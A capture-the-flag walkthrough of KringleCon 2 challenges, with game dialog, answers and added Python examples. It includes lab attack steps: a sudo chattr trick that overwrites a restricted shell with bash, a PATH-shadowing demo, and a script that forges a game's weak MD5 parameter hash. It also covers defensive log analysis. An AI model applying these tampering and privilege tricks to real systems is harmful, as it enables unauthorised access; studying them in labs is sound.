Kringlecon 2: Turtle Doves

[ ctf  challenges  ]

Intro

Location: Train Station

Initial Dialog - Santa:

Welcome to the North Pole and KringleCon 2! Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded. We moved the event to Elf University (Elf U for short), the North Pole’s largest venue. Please feel free to explore, watch talks, and enjoy the con!



Console - Escape Ed

Location: Train Station

Initial Dialog - Bushy Evergreen:

Hi, I’m Bushy Evergreen. Welcome to Elf U! I’m glad you’re here. I’m the target of a terrible trick. Pepper Minstix is at it again, sticking me in a text editor. Pepper is forcing me to learn ed. Even the hint is ugly. Why can’t I just use Gedit? Please help me just quit the grinchy thing.



Technical:

Ctrl-C and Ctrl-Z do nothing here. ed gives almost no feedback: anything it does not understand is answered with a bare ?.
Typing q and pressing Enter quits. (If the buffer had unsaved changes, q would answer ? as well; Q quits unconditionally.)

Completed Dialog - Bushy Evergreen:

Wow, that was much easier than I’d thought. Maybe I don’t need a clunky GUI after all! Have you taken a look at the password spray attack artifacts? I’ll bet that DeepBlueCLI tool is helpful. You can check it out on GitHub. It was written by that Eric Conrad. He lives in Maine - not too far from here!

Objective 0 - Talk To Santa

Enter the campus quad and talk to Santa

Location: The Quad



Completed Dialog - Santa:

This is a little embarrassing, but I need your help. Our KringleCon turtle dove mascots are missing! They probably just wandered off. Can you please help find them? To help you search for them and get acquainted with KringleCon, I’ve created some objectives for you. You can see them in your badge. Where’s your badge? Oh! It’s that big, circle emblem on your chest - give it a tap! We made them in two flavors - one for our new guests, and one for those who’ve attended both KringleCons. After you find the Turtle Doves and complete objectives 2-5, please come back and let me know. Not sure where to start? Try hopping around campus and talking to some elves. If you help my elves with some quicker problems, they’ll probably remember clues for the objectives.

Objective 1 - Find the Turtle Doves

Find the missing turtle doves

Location: Student Union



Completed Dialog - Santa:

Thank you for finding Jane and Michael, our two turtle doves! I’ve got an uneasy feeling about how they disappeared. Turtle doves wouldn’t wander off like that. Someone must have stolen them! Please help us find the thief! It’s a moral imperative! I think you should look for an entrance to the steam tunnels and solve Challenge 6 and 7 too! Gosh, I can’t help but think: Winds in the East, snow coming in… Like something is brewing and about to begin! Can’t put my finger on what lies in store, But I fear what’s to happen all happened before!



Objective 2 - Unredact Threatening Document

Someone sent a threatening letter to Elf University. What is the first word in ALL CAPS in the subject line of the letter? Please find the letter in the Quad.

Location: The Quad

Technical:

Open the document in a PDF viewer on Linux.
The black bars are drawn on top of text that is still present in the file, so selecting across a bar (or copying all the text, or running pdftotext against the file) shows the "redacted" words. Proper redaction has to remove the underlying text, not cover it.
The first word in all caps in the subject line is DEMAND.

Console - Smart Braces

Location: Student Union

Initial Dialog - Kent Tinseltooth:

OK, this is starting to freak me out! Oh sorry, I’m Kent Tinseltooth. My Smart Braces are acting up. Do… Do you ever get the feeling you can hear things? Like, voices? I know, I sound crazy, but ever since I got these… Oh! Do you think you could take a look at my Smart Braces terminal? I’ll bet you can keep other students out of my head, so to speak. It might just take a bit of Iptables work.


Technical:

After letting the dialog play through, we are told of a file to review.
The file spells out the set of iptables rules Kent needs entered.
iptables is a privileged command, so we check sudo -l and see we can run it with sudo without a password.
After entering the rules we wait until Kent checks them.

Completed Dialog - Kent Tinseltooth:

Oh thank you! It’s so nice to be back in my own head again. Er, alone. By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks. There are funny rhymes, references to perspective, and odd mentions of eggs! And if you think the stuff in your browser looks strange, you should see the page source… Special tools? No, I don’t think you’ll need any extra tooling for those locks. BUT - I’m pretty sure you’ll need to use Chrome’s developer tools for that one. Or sorry, you’re a Firefox fan? Yeah, Safari’s fine too - I just have an ineffable hunger for a physical Esc key. Edge? That’s cool. Hm? No no, I was thinking of an unrelated thing. Curl fan? Right on! Just remember: the Windows one doesn’t like double quotes. Old school, huh? Oh sure - I’ve got what you need right here…



Console - Linux Path

Location: Hermey Hall

Initial Dialog - SugarPlum Mary

Oh me oh my - I need some help! I need to review some files in my Linux terminal, but I can’t get a file listing. I know the command is ls, but it’s really acting up. Do you think you could help me out? As you work on this, think about these questions: Do the words in green have special significance? How can I find a file with a specific name? What happens if there are multiple executables with the same name in my $PATH?


Technical:

The terminal highlights lots of hints in green to help find the correct ls.
Simply typing ls doesn’t work: the shell runs whichever ls it finds first in $PATH, and here that is not the real binary. Calling it by its usual absolute path, /bin/ls, bypasses the $PATH lookup entirely and prints the directory listing.
We read the file rejected-elfu-logos.txt.
Bonus: listing hidden files with /bin/ls -alh also turns up .elfscream.txt.
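The $PATH question SugarPlum Mary asks is worth seeing in code. The following is an added example, not part of the original writeup: it resolves every executable with a given name in PATH order (what `type -a ls` shows in a shell), then builds a throw-away scenario in which a fake ls planted in a scratch directory at the front of PATH shadows the real one. The fake script contents and the directory layout are constructed for the demonstration.

```python
import os
import stat
import tempfile


def is_executable_file(path):
    """Regular file with at least one execute bit set (permission bits only,
    which is the check the shell's lookup makes before it tries to exec)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def find_all_in_path(name, path_env):
    """Every executable called `name` in `path_env`, in lookup order.
    Element 0 is what a bare `name` would run; `type -a name` prints the same list."""
    hits = []
    for directory in path_env.split(os.pathsep):
        if not directory:
            continue  # an empty entry means "current directory"; ignore it here
        candidate = os.path.join(directory, name)
        if is_executable_file(candidate):
            hits.append(candidate)
    return hits


def demo(command="ls"):
    """Constructed scenario: plant a fake `command` in a scratch directory
    prepended to PATH and show that it now shadows the real binary."""
    system_path = os.environ.get("PATH", "/usr/local/bin:/usr/bin:/bin")
    real_hits = find_all_in_path(command, system_path)
    with tempfile.TemporaryDirectory() as trojan_dir:
        fake = os.path.join(trojan_dir, command)
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho 'This is not the ls you are looking for'\n")
        os.chmod(fake, 0o755)
        hijacked_path = trojan_dir + os.pathsep + system_path
        hits = find_all_in_path(command, hijacked_path)
    return {
        "resolved_first": hits[0],   # what typing a bare `ls` would actually execute
        "fake": fake,
        "real": real_hits,           # still reachable by absolute path, e.g. /bin/ls
        "all": hits,
    }


if __name__ == "__main__":
    result = demo()
    print("bare `ls` resolves to:", result["resolved_first"])
    print("every ls in PATH order:", result["all"])
```

The absolute path /bin/ls works in the challenge for exactly the reason the demo shows: a path containing a slash is never looked up in $PATH, so a trojaned copy earlier in the search order is skipped.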

Completed Dialog - SugarPlum Mary

Oh there they are! Now I can delete them. Thanks! Have you tried the Sysmon and EQL challenge? If you aren’t familiar with Sysmon, Carlos Perez has some great info about it. Haven’t heard of the Event Query Language? Check out some of Ross Wolf’s work on EQL or that blog post by Josh Wright in your badge.

Console - Nyanshell

Location: Speaker UNpreparedness Room

Initial Dialog - Alabaster Snowball

Welcome to the Speaker UNpreparedness Room! My name’s Alabaster Snowball and I could use a hand. I’m trying to log into this terminal, but something’s gone horribly wrong. Every time I try to log in, I get accosted with … a hatted cat and a toaster pastry? I thought my shell was Bash, not flying feline. When I try to overwrite it with something else, I get permission errors. Have you heard any chatter about immutable files? And what is sudo -l telling me? Who would do such a thing?? Well, it IS a good looking cat. Have you heard about the Frido Sleigh contest? There are some serious prizes up for grabs. The content is strictly for elves. Only elves can pass the CAPTEHA challenge required to enter. I heard there was a talk at KCII about using machine learning to defeat challenges like this. I don’t think anything could ever beat an elf though!


Technical:

We can su to alabaster_snowball since we have the password.
Doing so presents us with a forever-running, flying, magical Nyan cat instead of a shell.
We check what we can run with elevated privileges using sudo -l; the one entry is chattr.
We look up what chattr does and find it changes file attributes… hmm.
Looking around we find an interesting file, /entrypoint.sh, at the root of the filesystem.
It shows that /bin/nsh cannot be changed because chattr made it immutable (+i).
We verify this with lsattr /bin/nsh.
So let’s make it changeable again with sudo chattr -i /bin/nsh.
chattr on its own does not get us a different shell, but if we look at the file’s permissions we see we can write to it :)
We simply cat /bin/bash over it (cat /bin/bash > /bin/nsh) and then su as alabaster_snowball again.

Objective 3 - Windows Log Analysis: Evaluate Attack Outcome

We’re seeing attacks against the Elf U domain! Using the event log data, identify the user account that the attacker compromised using a password spray attack. Bushy Evergreen is hanging out in the train station and may be able to help you out.

DeepBlueCLI Powershell Script

Technical:

After downloading and extracting the files, we read Eric Conrad’s post on DeepBlueCLI.
There may be other ways to do this objective, but I simply ran the tool and exported its output to CSV.
Opening the file in Notepad++, towards the end there is a long run of "Total Logon Failures 77".
A password spray tries the same small set of passwords against every account, so each target accumulates the same number of failures. The account where a password actually worked ends its run early, so it shows one fewer failure (76) alongside a successful logon :)
With that, supatree is the account that was compromised.
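The "one fewer failure" reasoning above can be turned into a detection. The following is an added example, not part of the original writeup and not the Elf U data: it builds a constructed batch of Windows Security events (4625 = failed logon, 4624 = successful logon, in a simplified dict form), groups failures by source address, flags sources that hit many accounts, and names the account whose failure count is lower than its neighbours and which also has a success from the same source.

```python
from collections import Counter, defaultdict


def build_sample_events():
    """Constructed events: 10.0.0.5 sprays five accounts with three passwords;
    the second password works for 'dave', so his run stops after two failures."""
    events = []
    attacker = "10.0.0.5"
    for user in ["alice", "bob", "carol", "dave", "erin"]:
        failures = 2 if user == "dave" else 3
        for _ in range(failures):
            events.append({"EventID": 4625, "TargetUserName": user, "IpAddress": attacker})
    events.append({"EventID": 4624, "TargetUserName": "dave", "IpAddress": attacker, "LogonType": 3})
    # Benign noise: alice mistypes once, then logs on from her own workstation.
    events.append({"EventID": 4625, "TargetUserName": "alice", "IpAddress": "10.0.0.20"})
    events.append({"EventID": 4624, "TargetUserName": "alice", "IpAddress": "10.0.0.20", "LogonType": 2})
    return events


def analyze_spray(events, min_targets=3):
    """Per source IP: count failures per account and collect accounts that
    succeeded. A source hitting >= min_targets accounts is a spray; within it,
    an account with fewer failures than the typical count plus a success is
    the one the sprayer got into."""
    failures = defaultdict(Counter)   # ip -> {user: failure count}
    successes = defaultdict(set)      # ip -> {users with a 4624}
    for e in events:
        if e["EventID"] == 4625:
            failures[e["IpAddress"]][e["TargetUserName"]] += 1
        elif e["EventID"] == 4624:
            successes[e["IpAddress"]].add(e["TargetUserName"])

    findings = []
    for ip, per_user in failures.items():
        if len(per_user) < min_targets:
            continue  # a handful of targets is a typo, not a spray
        typical = Counter(per_user.values()).most_common(1)[0][0]
        compromised = sorted(u for u, n in per_user.items()
                             if n < typical and u in successes[ip])
        findings.append({"source": ip, "targets": len(per_user),
                         "typical_failures": typical, "compromised": compromised})
    return findings


if __name__ == "__main__":
    for finding in analyze_spray(build_sample_events()):
        print(finding)
```

Against the challenge data the same logic would report 77 as the typical failure count and supatree as the account with 76 failures and a success; on a real network, keying by source address also separates the spray from ordinary lockout noise.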

Objective 4 - Windows Log Analysis: Determine Attacker Technique

Using these normalized Sysmon logs, identify the tool the attacker used to retrieve domain password hashes from the lsass.exe process. For hints on achieving this objective, please visit Hermey Hall and talk with SugarPlum Mary.

EQL Post

Technical:

After downloading and extracting the file, we look at Josh Wright’s post on the SANS blog.
If you actually read the post, it walks through this very dataset with EQL and names the tool: ntdsutil.
Answer: ntdsutil

Console - Xmas Cheer Laser

Location: Hermey Hall / Laboratory

Initial Dialog - Sparkle Redberry

I’m Sparkle Redberry and Imma chargin’ my laser! Problem is: the settings are off. Do you know any PowerShell? It’d be GREAT if you could hop in and recalibrate this thing. It spreads holiday cheer across the Earth … … when it’s working!


Technical:

We’re given a PowerShell console. The laser is driven through a web API and has to be set to output 5 Mega-Jollies per liter; the settings we need are hidden in various places on the system.
Invoking the command shown on the welcome screen shows how the laser API works.
The file mentioned in the welcome message hints at the command history, so we run Get-History | fl.
That gives us the angle value and another hint suggesting we look at the system environment variables.
Listing the variables (Get-ChildItem Env:) and formatting the output gives the next hint: recursively search /etc by LastWriteTime.
From /etc, Get-ChildItem -R | sort LastWriteTime turns up the file archive in /etc/apt.
We’ll need to expand it. Rather than dump it into /tmp with everything else, create a fresh directory with New-Item -ItemType Directory /tmp/bz.
Then extract the archive there with Expand-Archive -Path /etc/apt/archive -DestinationPath /tmp/bz.
This yields a new directory, refraction, with two files.
runme.elf needs the execute bit (chmod +x runme.elf); running it gives us the refraction value.
The riddle file gives us an MD5 hash of a file somewhere in /home/elf. Hashing the files there (Get-FileHash -Algorithm MD5) and matching the hash finds the file, and its contents reveal the temperature value.
The next hint is to search recursively through /home/elf/depths, which holds thousands of .txt files. Get-ChildItem -Recurse ./depths/ -Filter *.txt | % { $_.FullName } | Sort-Object -Property Length sorts the full paths by string length, so the odd one out is at the end.
That very long path leads to a .txt file whose contents give the next hint.
We need to kill specific processes, owned by different users, in the order listed.
First gather that information (Get-Process -IncludeUserName shows the owner), then stop them one by one, after which we can view the contents of /shall/see.
The next hint points to an event log with an .xml extension in /etc.
Then we need to find the unique event. This one took a little while to figure out: event ID 1800 appears only twice, which makes it stand out from all the other IDs.
Looking closely at the properties of those events, we find the values for the gases.
So now we put it all together:
1. Turn off the laser
2. Update the refraction, temperature and angle values
3. Update the gases
4. Turn on the laser
5. Check the output
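The event-log step is the one the writeup says took a while, so here it is as an added example (not part of the original, which did this in PowerShell): parse an exported Windows event log in the standard Event XML schema, count events per EventID, and pull out the events whose ID occurs an unusual number of times, along with their EventData. The XML is constructed for the example; the IDs, counts and Data names are made up and are not the challenge's values.

```python
import xml.etree.ElementTree as ET
from collections import Counter

# Namespace used by Windows Event XML exports.
NS = "http://schemas.microsoft.com/win/2004/08/events/event"

# Constructed log: ID 1000 appears three times, 1100 twice, 1200 once.
SAMPLE_EVENTS_XML = """<Events>
  <Event xmlns="{ns}"><System><EventID>1000</EventID></System><EventData><Data Name="Message">heartbeat</Data></EventData></Event>
  <Event xmlns="{ns}"><System><EventID>1000</EventID></System><EventData><Data Name="Message">heartbeat</Data></EventData></Event>
  <Event xmlns="{ns}"><System><EventID>1100</EventID></System><EventData><Data Name="Setting">Mixture=A:10,B:20</Data></EventData></Event>
  <Event xmlns="{ns}"><System><EventID>1000</EventID></System><EventData><Data Name="Message">heartbeat</Data></EventData></Event>
  <Event xmlns="{ns}"><System><EventID>1100</EventID></System><EventData><Data Name="Setting">Mixture=A:12,B:18</Data></EventData></Event>
  <Event xmlns="{ns}"><System><EventID>1200</EventID></System><EventData><Data Name="Message">shutdown</Data></EventData></Event>
</Events>
""".format(ns=NS)


def parse_events(xml_text):
    """Flatten each <Event> into {'EventID': int, 'Data': {Name: text}}."""
    root = ET.fromstring(xml_text)
    events = []
    for ev in root.iter("{%s}Event" % NS):
        event_id = int(ev.findtext("{%s}System/{%s}EventID" % (NS, NS)))
        data = {d.get("Name"): (d.text or "") for d in ev.iter("{%s}Data" % NS)}
        events.append({"EventID": event_id, "Data": data})
    return events


def count_by_id(events):
    return Counter(e["EventID"] for e in events)


def events_with_count(events, n):
    """Events whose EventID occurs exactly n times in the log."""
    counts = count_by_id(events)
    return [e for e in events if counts[e["EventID"]] == n]


def rarest_ids(events, k=1):
    """The k least frequent EventIDs (the 'unique' events worth reading)."""
    return [eid for eid, _ in count_by_id(events).most_common()[::-1][:k]]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS_XML)
    print("counts:", dict(count_by_id(evs)))
    for e in events_with_count(evs, 2):
        print(e["EventID"], e["Data"])
```

On a log with thousands of entries, printing the frequency table first (and reading from the bottom) is faster than scrolling: the IDs that occur once or twice are the ones someone placed there deliberately.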

Completed Dialog - Sparkle Redberry

You got it - three cheers for cheer! For objective 5, have you taken a look at our Zeek logs? Something’s gone wrong. But I hear someone named Rita can help us. Can you and she figure out what happened?

Objective 5 - Network Log Analysis: Determine Compromised System

The attacks don’t stop! Can you help identify the IP address of the malware-infected system using these Zeek Logs? For hints on achieving this objective, please visit the Laboratory and talk with Sparkle Redberry.

Technical

After downloading and extracting the files we find a lot of Zeek logs, but also a web interface built on RITA.
Among the reports available, Long Connections is a good indicator of malware: a C2 channel tends to hold a session open far longer than ordinary browsing or DNS traffic does.
Using the first IP in that list, 192.168.134.130, we complete the objective.
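What RITA's Long Connections report does is simple enough to reproduce directly from conn.log. The following is an added example, not part of the original writeup or RITA's code: it parses a constructed Zeek conn.log excerpt (tab-separated, with Zeek's #fields header; only the columns used here are included, and the hosts and durations are made up), sums connection duration per source/destination/port tuple, and ranks the tuples. Zeek writes '-' for a missing value, which the parser has to skip rather than cast.

```python
from collections import defaultdict

# Constructed conn.log excerpt in Zeek's TSV layout.
SAMPLE_CONN_LOG = "\n".join([
    "#separator \\x09",
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tduration\torig_bytes\tresp_bytes",
    "1575000000.0\tC1\t192.168.1.10\t51000\t93.184.216.34\t443\ttcp\t1.2\t500\t7000",
    "1575000010.0\tC2\t192.168.1.77\t52000\t203.0.113.9\t8443\ttcp\t86400.0\t120000\t45000",
    "1575000020.0\tC3\t192.168.1.10\t51001\t93.184.216.34\t443\ttcp\t0.8\t300\t5000",
    "1575000030.0\tC4\t192.168.1.77\t52001\t203.0.113.9\t8443\ttcp\t43200.0\t60000\t22000",
    "1575000040.0\tC5\t192.168.1.20\t53\t192.168.1.1\t53\tudp\t-\t60\t120",
])


def parse_conn_log(text):
    """Turn Zeek TSV into dicts keyed by the names in the #fields header."""
    fields = None
    rows = []
    for line in text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]
        elif line.startswith("#") or not line.strip():
            continue  # other header/footer lines (#separator, #close, ...)
        else:
            rows.append(dict(zip(fields, line.split("\t"))))
    return rows


def long_connections(rows, top=5):
    """Total duration per (src, dst, dst_port), longest first.
    Summing, rather than taking the single longest session, also catches
    a C2 channel that reconnects rather than holding one socket open."""
    totals = defaultdict(float)
    for r in rows:
        if r.get("duration", "-") == "-":
            continue  # Zeek's unset marker; not a zero-length connection
        key = (r["id.orig_h"], r["id.resp_h"], int(r["id.resp_p"]))
        totals[key] += float(r["duration"])
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)[:top]


if __name__ == "__main__":
    for (src, dst, port), seconds in long_connections(parse_conn_log(SAMPLE_CONN_LOG)):
        print("{:<16} -> {:<16}:{:<5} {:>10.1f}s".format(src, dst, port, seconds))
```

Long duration is a signal, not proof: VPNs, database replication and monitoring agents also keep sessions open for days, so the next step is to check what the top talker is (here the internal host talking to a public address on a non-standard port) before calling it infected.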

Objective 6 - Splunk

Access https://splunk.elfu.org/ as elf with password elfsocks. What was the message for Kent that the adversary embedded in this attack? The SOC folks at that link will help you along! For hints on achieving this objective, please visit the Laboratory in Hermey Hall and talk with Prof. Banas.

Initial Dialog - Professor Banas

Hi, I’m Dr. Banas, professor of Cheerology at Elf University. This term, I’m teaching “HOL 404: The Search for Holiday Cheer in Popular Culture,” and I’ve had quite a shock! I was at home enjoying a nice cup of Gløgg when I had a call from Kent, one of my students who interns at the Elf U SOC. Kent said that my computer has been hacking other computers on campus and that I needed to fix it ASAP! If I don’t, he will have to report the incident to the boss of the SOC. Apparently, I can find out more information from this website https://splunk.elfu.org/ with the username: elf / Password: elfsocks. I don’t know anything about computer security. Can you please help me?


Technical:

After logging in we are greeted with a welcome message with general guidance
Question 1: What is the short host name of Professor Banas’ computer?

Answer 1: sweetums

We do a quick search over everything and find there is only one value in the ComputerName field.

Question 2: What is the name of the sensitive file that was likely accessed and copied by the attacker? Please provide the fully qualified location of the file. (Example: C:\temp\report.pdf)

Answer 2: ‘C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt’

The helpful chat indicates the professor was close with Santa, so we search everything for ‘santa’ and find a file that could be of importance :)

Question 3: What is the fully-qualified domain name(FQDN) of the command and control(C2) server? (Example: badguy.baddies.com)

Answer 3: ‘144.202.46.214.vultr.com’

The helpful chat suggests looking at the additional fields after the query. Looking there, there is only one DestinationHostname.

Question 4: What document is involved with launching the malicious PowerShell code? Please provide just the filename. (Example: results.txt)

Answer 4: 19th Century Holiday Cheer Assignment.docm

The hint is in the wording of the question ("document"), so we do a wildcard search for the usual document extensions and find a suspicious macro-enabled one (.docm).

Question 5: How many unique email addresses were used to send Holiday Cheer essays to Professor Banas? Please provide the numeric value. (Example: 1)

Answer 5: 21

Once shown how to search the stoQ events and given the subject line, we can run stats over that and the sender fields to get the number.

Question 6: What was the password for the zip archive that contained the suspicious file?

Answer 6: 123456789

Since we know the file name we search for it and then look at the SMTP body for the password.

Question 7: What email address did the suspicious file come from?

Answer 7: Bradly.Buttercups@eIfu.org (note the domain: eIfu.org with a capital I, a lookalike of elfu.org)

Using the same query we look at the SMTP From field.

Challenge Question: What was the message for Kent that the adversary embedded in this attack?

Challenge Answer: Kent you are so unfair. And we were going to make you the king of the Winter Carnival.

Taking some direction from the helpful chat, we start with what we already know: the email from Bradly Buttercups.

We then extend the search as the hint recommends and see the .docm file listed at ‘/home/ubuntu/archive/c/6/e/1/7/c6e175f5b8048c771b3a3fac5f3295d2032524af/19th Century Holiday Cheer Assignment.docm’.

Using the File Archive, we browse to this file and download it. A .docm is a zip of XML parts; viewing the file we’re told to look at core.xml, the part that holds the document’s metadata (author, comments and so on).

We find that file at ‘/home/ubuntu/archive/f/f/1/e/a/ff1ea6f13be3faabd0da728f514deb7fe3577cc4/core.xml’.

And we complete the objective.

Completed Dialog - Professor Banas

Oh, thanks so much for your help! Sorry I was freaking out. I’ve got to talk to Kent about using my email again… …and picking up my dry cleaning.

Console - Mongo Pilfer

Location: Hermey Hall / NetWars

Initial Dialog - Holly Evergreen

Hey! It’s me, Holly Evergreen! My teacher has been locked out of the quiz database and can’t remember the right solution. Without access to the answer, none of our quizzes will get graded. Can we help get back in to find that solution? I tried lsof -i, but that tool doesn’t seem to be installed. I think there’s a tool like ps that’ll help too. What are the flags I need? Either way, you’ll need to know a teensy bit of Mongo once you’re in. Pretty please find us the solution to the quiz!


Technical

Trying to connect with mongo gives an error: the server is not listening on the default port (27017).
netstat (e.g. netstat -tlnp) shows the port it is actually listening on, and we connect with mongo --port <port>.
Looking at the collections in the default database we see redherring, and of course there is nothing useful there.
show dbs lists the databases; we switch to elfu (use elfu) and show collections again.
‘solution’ looks like the right one :)
From there we just need to run the command shown between the asterisks.
We get a congratulations.

Completed Dialog - Holly Evergreen

Woohoo! Fantabulous! I’ll be the coolest elf in class. On a completely unrelated note, digital rights management can bring a hacking elf down. That ElfScrow one can really be a hassle. It’s a good thing Ron Bowes is giving a talk on reverse engineering! That guy knows how to rip a thing apart. It’s like he breathes opcodes!

Console - Frosty Keypad

Location: The Quad

Initial Dialog - Tangle Coalbox

Hey kid, it’s me, Tangle Coalbox. I’m sleuthing again, and I could use your help. Ya see, this here number lock’s been popped by someone. I think I know who, but it’d sure be great if you could open this up for me. I’ve got a few clues for you. One digit is repeated once. The code is a prime number. You can probably tell by looking at the keypad which buttons are used.


Technical

Looking at the keypad, the worn keys tell us 1, 3 and 7 are the digits used.
On a whim we try 1337; it doesn’t work (1337 = 7 × 191, so it isn’t prime anyway).
There are several ways to do this properly, e.g. a few lines of Python to enumerate the four-digit arrangements with one repeated digit and keep only the primes. Reversing the digits to 7331 worked :)
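Rather than guessing, the three clues (keys 1, 3 and 7 are used; one digit is repeated once; the code is prime) pin the search space down to a few dozen four-digit codes. The following is an added example, not part of the original writeup: it enumerates every arrangement of the worn keys plus one repeat and keeps the primes, which is a shorter list to try at the keypad. The four-digit length follows from the clues (three keys, one of them pressed twice); nothing else is assumed.

```python
from itertools import permutations


def is_prime(n):
    """Trial division is plenty for four- or five-digit codes."""
    if n < 2:
        return False
    if n % 2 == 0:
        return n == 2
    factor = 3
    while factor * factor <= n:
        if n % factor == 0:
            return False
        factor += 2
    return True


def candidate_codes(worn_keys):
    """All prime codes that use every worn key with exactly one key pressed
    twice; the code length is therefore len(worn_keys) + 1."""
    keys = sorted(set(worn_keys))
    found = set()
    for repeated in keys:
        for perm in permutations(keys + [repeated]):
            if perm[0] == 0:
                continue  # a leading zero would shorten the code
            code = int("".join(str(d) for d in perm))
            if is_prime(code):
                found.add(code)
    return sorted(found)


if __name__ == "__main__":
    codes = candidate_codes([1, 3, 7])
    print(len(codes), "candidates:", codes)
```

Any arrangement with two 1s has digit sum 12 and is divisible by 3, so the whole "1 repeated" branch drops out before trial division ever runs; the survivors all repeat the 3 or the 7.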

Completed Dialog - Tangle Coalbox

Yep, that’s it. Thanks for the assist, gumshoe. Hey, if you think you can help with another problem, Prof. Banas could use a hand too. Head west to the other side of the quad into Hermey Hall and find him in the Laboratory.

Console - Graylog

Location: Dorm

Initial Dialog - Pepper Minstix

It’s me - Pepper Minstix. Normally I’m jollier, but this Graylog has me a bit mystified. Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala. Some Elf U computers were hacked, and I’ve been tasked with performing incident response. Can you help me fill out the incident response report using our instance of Graylog? It’s probably helpful if you know a few things about Graylog. Event IDs and Sysmon are important too. Have you spent time with those? Don’t worry - I’m sure you can figure this all out for me! Click on the All messages Link to access the Graylog search interface! Make sure you are searching in all messages! The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner. Login with the username elfustudent and password elfustudent.


Technical

Credentials: elfustudent:elfustudent
Graylog’s search query documentation is the reference for the query syntax.
In the lower right-hand corner are 10 questions that need to be answered by searching through the logs (the screenshots of each answered question are omitted here).

Completed.

Completed Dialog - Pepper Minstix

That’s it - hooray! Have you had any luck retrieving scraps of paper from the Elf U server? You might want to look into SQL injection techniques. OWASP is always a good resource for web attacks. For blind SQLi, I’ve heard Sqlmap is a great tool. In certain circumstances though, you need custom tamper scripts to get things going!

Console - Holiday Hack Trail

Location: Dorm

Initial Dialog - Minty Candycane

Hi! I’m Minty Candycane! I just LOVE this old game! I found it on a 5 1/4” floppy in the attic. You should give it a go! If you get stuck at all, check out this year’s talks. One is about web application penetration testing. Good luck, and don’t get dysentery!


Technical

Easy:
1. Buy any amount of supplies and set off; you need to cover 8000 distance without dying.
2. Notice the game parameters are in the URL.
3. Change distance to 8000 in the URL and press the arrow.
4. Distance remaining now shows 0.
5. Select Go and win.

Medium:
1. Buy whatever and, again, 8000 distance without dying.
2. Notice there are no parameters in the URL now; they have moved into the POST body.
3. Turn on Intercept in Burp, press Go in the game, and switch to Burp to see the request.
4. In the intercepted request change distance to 8000 and forward it.
5. Win the game.

Hard:
1. Buy any amount and, again, 8000 distance without dying.
2. Nothing in the URL, and simply changing the parameter in Burp fails with a bad hash error.
3. Looking closer: the medium challenge had the literal string “HASH” as the value of the hash parameter, while this one carries an actual hash.
4. Looking even closer, the hash changes on every request.
5. We throw the hash at CrackStation and it finds a match: a plain number.
6. We go back and watch the trailhead video https://www.youtube.com/watch?v=0T6-DQtzCgM
7. So we try again: hash 08d98638c6fcd194a4b1e6992063e944 cracks to 682 and d4c2e4a3297fe25a71d030b67eb83bfc to 728. The numbers keep going up…
8. After a while I started subtracting numbers from the values in the POST request. It turns out that if you add up the parameters listed below, they equal the number the hash cracks to. So the “integrity” hash appears to be nothing more than an unsalted MD5 of the sum of the game values, which is why CrackStation knows it.
9. So, starting over, we grab the new hash and the number it cracks to (585).
10. We just need to set distance to 7999, adjust the total accordingly, and generate the MD5 of the new total.
11. We update Burp with the two new values.
12. Select Go and win.

Some calculations from the Burp request:

money=450 distance=164 curmonth=9 curday=4 reindeer=3 runners=4 ammo=12 meds=4 food=78 total=728 hash=d4c2e4a3297fe25a71d030b67eb83bfc

The nine game values sum to 728, the number CrackStation returned for this hash.
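The forging done by hand in hard mode, and the fix the game would need, as an added example that is not part of the original writeup: the weak check is reconstructed from the page's observation (MD5 of the decimal sum of the visible values, using the Burp request above as input), and the hardened variant (an HMAC over the canonical field list with a server-side key) is an assumed fix, not anything the game does.

```python
import hashlib
import hmac

# The POST body captured in Burp, as quoted above.
PAGE_PARAMS = {"money": 450, "distance": 164, "curmonth": 9, "curday": 4,
               "reindeer": 3, "runners": 4, "ammo": 12, "meds": 4, "food": 78}


def param_total(params):
    return sum(params.values())


def weak_sign(params):
    """The check reconstructed on the page: md5(str(sum of the values)).
    No secret is involved, so any client can recompute it."""
    return hashlib.md5(str(param_total(params)).encode()).hexdigest()


def weak_verify(params, presented_hash):
    return hmac.compare_digest(weak_sign(params), presented_hash)


def forge(params, **changes):
    """What the author did by hand: change fields, then re-sign."""
    forged = dict(params, **changes)
    return forged, weak_sign(forged)


# Assumed fix: keyed hash over every field in a fixed order. Without the key
# the client cannot produce a valid tag for tampered values, and binding the
# field names stops value-shuffling that keeps the sum the same.
def strong_sign(params, key):
    canonical = "&".join("{}={}".format(k, params[k]) for k in sorted(params))
    return hmac.new(key, canonical.encode(), hashlib.sha256).hexdigest()


def strong_verify(params, presented_tag, key):
    return hmac.compare_digest(strong_sign(params, key), presented_tag)


if __name__ == "__main__":
    print("total:", param_total(PAGE_PARAMS), "md5:", weak_sign(PAGE_PARAMS))
    forged, tag = forge(PAGE_PARAMS, distance=7999)
    print("forged total:", param_total(forged), "new md5:", tag)
    key = b"server-side-secret"  # constructed for the example
    print("HMAC accepts tampered values:", strong_verify(forged, strong_sign(PAGE_PARAMS, key), key))
```

Even the HMAC only proves the client did not edit the fields; a game (or a checkout flow) that trusts client-supplied distance at all is still wrong, and the real fix is to keep the state on the server and send the client a session identifier.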

Completed Dialog - Minty Candycane

You made it - congrats! Have you played with the key grinder in my room? Check it out! It turns out: if you have a good image of a key, you can physically copy it. Maybe you’ll see someone hopping around with a key here on campus. Sometimes you can find it in the Network tab of the browser console. Deviant has a great talk on it at this year’s Con. He even has a collection of key bitting templates for common vendors like Kwikset, Schlage, and Yale.

Objective 7 - Get Access To The Steam Tunnels

Gain access to the steam tunnels. Who took the turtle doves? Please tell us their first and last name. For hints on achieving this objective, please visit Minty’s dorm room and talk with Minty Candy Cane.

Location: Dorm

Technical:

